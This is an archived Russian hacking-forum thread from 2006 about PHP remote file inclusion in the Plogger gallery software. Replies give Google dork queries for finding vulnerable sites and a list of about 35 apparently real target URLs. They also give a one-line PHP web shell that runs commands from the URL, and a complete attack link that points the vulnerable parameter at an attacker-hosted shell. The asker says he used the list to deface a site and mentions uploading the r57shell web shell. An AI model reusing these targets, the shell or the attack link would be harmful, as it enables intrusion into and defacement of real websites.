Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
11.01.2006, 22:02
|
|
Познающий
Регистрация: 24.07.2005
Сообщений: 43
Провел на форуме:
127280
Репутация:
-3
|
|
Php инклудинг
Привет!Может ктонибуть подсказать как искать сайты с пхп инжекцией!Я вчера полинета перерыл но нашел только один!!Подскжите как их искать или скажите несколько сайтов у которых есть эта уезвимость!ПЛИИЗ!
|
|
|
Есть такое понятие поисковик! =) |
11.01.2006, 22:06
|
|
Постоянный
Регистрация: 21.12.2005
Сообщений: 620
Провел на форуме:
1867718
Репутация:
268
|
|
Есть такое понятие поисковик! =)
Есть такое понятие поисковик! =)
Юзай www.Google.ru
Можно искать запросами:
inurl:"page.php?page=" filetype  hp
inurl:"index.php?page=" filetype hp
inurl:"page.php?page=" site:.ru
inurl:"page.php?p=" site:.ru
inurl:"index.php?page=" site:.com
Ну там много разных вариаций. |
|
|
|
11.01.2006, 22:18
|
|
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903
Репутация:
345
|
|
половина из них сдохла, но может найдешь действующие
на удаленом хосте должен быть файл plog-functions.php
Код HTML:
http://www.magnapop.com/photos/admin/plog-admin-functions.php?config[basedir]=
http://www.mindcyber.com/wallpaper/admin/plog-admin-functions.php?config[basedir]=
http://www.kasnews.de/kunst/admin/plog-admin-functions.php?config[basedir]=
http://www.distortion2static.com/gallery/admin/plog-admin-functions.php?config[basedir]=
http://www.ncfiremuseum.org/ploggerb2/admin/plog-admin-functions.php?config[basedir]=
http://kelly.greneaux.com/pictures/admin/plog-admin-functions.php?config[basedir]=
http://216.22.25.215/~neeners/classic/gallery/admin/plog-admin-functions.php?config[basedir]=
http://musicbc.org/ploggerb2/admin/plog-admin-functions.php?config[basedir]=
http://www.samson-mfg.com/gallery2/admin/plog-admin-functions.php?config[basedir]=
http://www.z90.com/gallery/admin/plog-admin-functions.php?config[basedir]=
http://www.dogtopia.biz/photos/admin/plog-admin-functions.php?config[basedir]=
http://www.wilcofoppen.com/plogger/admin/plog-admin-functions.php?config[basedir]=
http://www.aabany.org/blog/galeria/admin/plog-admin-functions.php?config[basedir]=
http://www.newdesire.org/gallery/admin/plog-admin-functions.php?config[basedir]=
http://www.boricuapower.net/plogger/admin/plog-admin-functions.php?config[basedir]=
http://www.aurorapemper.com/pictures/admin/plog-admin-functions.php?config[basedir]=
http://91x.com/gallery/admin/plog-admin-functions.php?config[basedir]=
http://www.helpanimalsinc.org/pictures/admin/plog-admin-functions.php?config[basedir]=
http://www.trieste.si/miramare/plogger/admin/plog-admin-functions.php?config[basedir]=
http://dougal.gunters.org/test/plog/admin/plog-admin-functions.php?config[basedir]=
http://photos.pivwan.net/admin/plog-admin-functions.php?config[basedir]=
http://letatou.info/galerie/admin/plog-admin-functions.php?config[basedir]=
http://theg3nius.com/photoblog/admin/plog-admin-functions.php?config[basedir]=
http://www.diazvillanueva.com/fotografia/admin/plog-admin-functions.php?config[basedir]=
http://www.hunder.ca/plogger/admin/plog-admin-functions.php?config[basedir]=
http://www.coyforce.com/gallery/admin/plog-admin-functions.php?config[basedir]=
http://www.ourense.com/galerias/admin/plog-admin-functions.php?config[basedir]=
http://www.fjellbruk.no/ploggerb2/admin/plog-admin-functions.php?config[basedir]=
http://www.karlshusgarasjene.no/ploggerb2/admin/plog-admin-functions.php?config[basedir]=
http://www.uitvaartbeurs.info/ploggerb2/admin/plog-admin-functions.php?config[basedir]=
http://caraga.dost.gov.ph/photoblog/admin/plog-admin-functions.php?config[basedir]=
http://www.rudylacy.com/photos/admin/plog-admin-functions.php?config[basedir]=
http://www.thefinalfantasy.com/picturepost/admin/plog-admin-functions.php?config[basedir]=
http://www.azadadventures.com/gallery/admin/plog-admin-functions.php?config[basedir]=
http://galleria.aainaa.com/admin/plog-admin-functions.php?config[basedir]=
|
|
|
|
11.01.2006, 23:00
|
|
Познающий
Регистрация: 24.07.2005
Сообщений: 43
Провел на форуме:
127280
Репутация:
-3
|
|
Ну чёт я не понял!!Я нашел сайт с инжекцией!!!Нашел файл залил его к себе на сайт а мне пишут
Fatal error: Cannot redeclare add_comment() (previously declared in /home/musicbco/public_html/ploggerb2/admin/plog-admin-functions.php:537) in http://site.narod.ru/plog-functions.php on line 377 |
|
|
|
11.01.2006, 23:09
|
|
Познавший АНТИЧАТ
Регистрация: 26.11.2004
Сообщений: 1,149
Провел на форуме:
941818
Репутация:
569
|
|
|
|
|
|
11.01.2006, 23:20
|
|
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903
Репутация:
345
|
|
plog-functions.php должен быть шелл, либо от rst либо самописный, типа
PHP код:
<?
if (!empty($_GET['cmd'])) {
echo '<pre>';
system($_GET['cmd']);
echo '</pre>';
exit;
}
?>
Плагиат Ж)
Вот пример конечной ссылки:
admin/plog-admin-functions.php?config[basedir]=http://Пурум-пум-пум.narod.ru&cmd=id;pwd;uname+-a;ls+-la
причем http://Пурум-пум-пум.narod.ru/plog-functions.php это шелл-код
Последний раз редактировалось max_pain89; 11.01.2006 в 23:25..
|
|
|
|
12.01.2006, 12:20
|
|
Познающий
Регистрация: 24.07.2005
Сообщений: 43
Провел на форуме:
127280
Репутация:
-3
|
|
max_pain89!я нашел из списка сайт!Дефейснул его как ты сказал!!!!На пиши плиииззз описание этой уязвимости и как её искать
|
|
|
|
12.01.2006, 12:23
|
|
Познающий
Регистрация: 24.07.2005
Сообщений: 43
Провел на форуме:
127280
Репутация:
-3
|
|
Кстати я залил в файл plog-functions.php шелл r57shell.php!начал дефейсить!Но выходит сообщение
Parse error: parse error, unexpected $, expecting ')' in http://framhack.narod.ru/plog-functions.php on line 787
что это и как можно исправить |
|
|
|
12.01.2006, 12:23
|
|
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903
Репутация:
345
|
|
анти4ат против дефэйсов
|
|
|
|
12.01.2006, 12:47
|
|
Познающий
Регистрация: 24.07.2005
Сообщений: 43
Провел на форуме:
127280
Репутация:
-3
|
|
ОК!Небуду дефейсить!Ну расскажи!ПЛИЗ!
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
